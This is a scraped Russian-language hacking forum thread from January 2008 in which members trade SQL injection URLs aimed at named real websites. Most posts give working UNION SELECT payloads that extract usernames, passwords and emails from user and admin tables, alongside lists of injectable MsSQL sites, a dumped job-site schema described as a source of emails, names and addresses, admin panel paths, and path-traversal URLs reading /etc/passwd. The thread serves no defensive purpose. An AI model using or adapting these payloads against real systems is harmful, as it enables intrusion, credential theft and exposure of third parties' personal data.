29.01.2008, 17:44
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
http://www.roskrup.ru/groats.html?goods=-17'+union+select+1,2,null,null,null,concat_ws(char (58),username,password,email),null,null,null,null, null,null,13+from+users/*
вот держи тебе и вывод и юзера какие-то не проверял откуда они, всего их 1624
|
|
|
29.01.2008, 18:17
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами:
10362626
Репутация:
327
|
|
MsSQL
ttp://www.gettech.org/category2.asp?cat='
ttp://www.readersclub.org/category.asp?cat='
ttp://www.zap.co.il/cat.asp?cat='
ttp://www.algemeiner.com/generic.asp?cat='
ttp://www.winstep.net/default.asp?cat='
ttp://www.hamil.co.il/media.asp?cat='
ttp://www.felinefido.com/store/WsDefault.asp?Cat='
ttp://www.britishbookshop.at/shop/prod_list.asp?cat='
ttp://www.newsreel.org/nav/topics.asp?cat='
ttp://www.fao.org/biotech/news_list.asp?Cat='
ttp://www.liberation.press.ma/default.asp?cat='
ttp://www.stateofthenewsmedia.com/2007/narrative_digital_profile.asp?cat='
ttp://www.airfagev.com/downloads.asp?cat='
|
|
|
|
29.01.2008, 19:00
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 107
С нами:
9948928
Репутация:
208
|
|
Код:
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0
nuke@localhost:4.0.16-log:didw |
|
|
|
Калькулятор через инъекцию |
29.01.2008, 19:16
|
Регистрация: 18.02.2006
Сообщений: 1,090
С нами:
10644806
Репутация:
1564
|
|
Калькулятор через инъекцию
чёт надоело уже видеть, как тут версии бд, и имена юзеров выкладывают...
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,cos(pi()/10),5,6,7,8,9/*
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,ATAN2(pi(),4),5,6,7,8,9/*
Последний раз редактировалось Mobile; 29.01.2008 в 19:36..
|
|
|
|
29.01.2008, 19:40
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
С нами:
10171592
Репутация:
50
|
|
http://www.jobs-market.ru
Код:
http://www.jobs-market.ru/resume.php?id=999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
version() - 5.0.51
database() - jobsmarket_job
user() - jobsmarket_job@localhost
Код:
17:adminip
17:--1:pass
18:bunsip
18:--1:bunsip
18:--2:why
18:--3:date
18:--4:period
19:category
19:--1:razdel
19:--2:podrazdel
26:resorderlist
26:--1:user
26:--2:unit
26:--3:number
26:--4:date
26:--5:status
27:resume
27:--14:family
27:--15:edu
32:--7:fio
32:--8:firm
32:--9:birth
32:--10:gender
32:--11:civil
32:--12:family
33:--7:zp
33:--8:gender
33:--9:grafic
33:--10:zanatost
33:--11:stage
33:--12:treb
33:--24:pay
Оставил самое интересное 
Можно снять базу мыл с фио и адресами
|
|
|
|
29.01.2008, 21:59
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
www.neo-lit.ru
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,name,pass), 5,6,7,8+from+neo_auth+limit+49,1/*
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,login,passw ord),5,6,7,8+from+u41707_other.myusers+limit+3,1/*
5.0.45-log
админка - http://neo-lit.ru/stat/ - но пасс не подошёл ..
есть табла respondents в ней (name и md5) но с префиксом и без него не могу попасть ..
http://neo-lit.ru/robots.txt
|
|
|
|
29.01.2008, 22:51
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Tyc00n, ты забыл про таблицу admins с полями pass и name админка - /admin |
|
|
|
30.01.2008, 02:25
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Tyc00n, руки все равно будут всегда лучше и надежнее Словари обнови, добавь стандартные таблицы и поля двигов распостраненных, сам допиши, посмотри по форуму и не будет пропускать) |
|
|
|
30.01.2008, 11:59
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
sql inj
http://teh-nn.ru/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6+from+users
http://www.loran-eko.ru/news.php?id=-3+UNION+SELECT+1,concat(login,0x3a,pass),3,4,5+fro m+users
http://www.dhmr.ru/news.php?id=-3+union+select+1,2,3,4,version(),6+users
php inc
http://www.wearetheclips.com/main.php?p=../../../../../etc/passwd
http://www.prescription.fr/index.php?p=../../../../etc/passwd
|
|
|
|
30.01.2008, 12:31
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
b3, что-то мне подсказывает, что для пхп-инжей тут есть отдельная тема)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
